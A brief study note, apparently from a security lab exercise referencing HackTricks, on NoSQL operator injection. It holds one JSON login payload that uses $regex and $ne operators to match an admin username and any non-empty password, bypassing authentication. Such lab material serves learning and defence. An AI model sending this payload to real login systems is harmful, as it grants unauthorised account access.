NoSQL injection

NoSQL injection | HackTricks

Lab: Exploiting NoSQL operator injection to bypass authentication

{
    "username":{
        "$regex":"admin.*"
        },
    "password":{
        "$ne":""
        }
    }